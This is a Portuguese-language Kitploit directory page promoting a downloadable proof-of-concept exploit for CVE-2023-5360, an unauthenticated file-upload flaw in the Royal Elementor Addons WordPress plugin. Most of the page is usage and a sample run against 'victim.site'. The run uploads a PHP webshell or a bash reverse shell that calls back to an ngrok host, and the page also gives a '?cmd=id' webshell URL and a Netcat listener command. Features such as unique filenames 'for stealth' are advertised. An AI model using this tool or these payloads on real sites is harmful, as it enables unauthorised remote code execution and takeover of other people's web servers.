Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/x3rx3ssec/cve-2023-5360
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de Penetração
GitHubx3rx3ssec/cve-2023-5360

CVE-2023-5360

Royal Elementor Addons - Execução Remota de Código Não Autenticada

Ver Repositório
211há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-5360 Exploit de Upload de Arquivo do Elementor

O plugin Royal Elementor Addons and Templates para WordPress, anterior à versão 1.3.79, não valida corretamente os arquivos enviados, o que pode permitir que usuários não autenticados enviem arquivos arbitrários, como PHP, e obtenham execução remota de código (RCE).

root@kitploit:~
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S

Descrição

Este é um exploit de prova de conceito para CVE-2023-5360, uma vulnerabilidade de upload de arquivos no Elementor Pro para WordPress. Ele permite que um atacante não autenticado envie arquivos PHP arbitrários e obtenha execução remota de código.

Recursos

  • Obtém o nonce do Elementor automaticamente
  • Envia uma webshell simples ou reverse shell
  • Nomes de arquivo únicos para furtividade
  • Helper opcional de listener Netcat
  • Sexy pra caramba

Uso

root@kitploit:~
python3 CVE-2023-5360.py <https://victim.site/>

Exemplo:

root@kitploit:~
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3XRX3SSec    
      by X3XRX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣

Opções de payload:

  1. Webshell de comando simples (?cmd=id, como em: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. Reverse shell (Bash)

Dependências

  • Python 3.x
  • Módulo requests

Instale as dependências:

root@kitploit:~
pip install requests

Exemplo de listener

root@kitploit:~
nc -lvnp 1337

Aviso legal

Este exploit é apenas para fins educacionais e testes de segurança autorizados. Você é responsável pela forma como o utiliza. Teste apenas em sistemas que você possui ou para os quais tem permissão de testar.

Créditos

Autor: X3RX3S CVE-2023-5360

Baixar ferramenta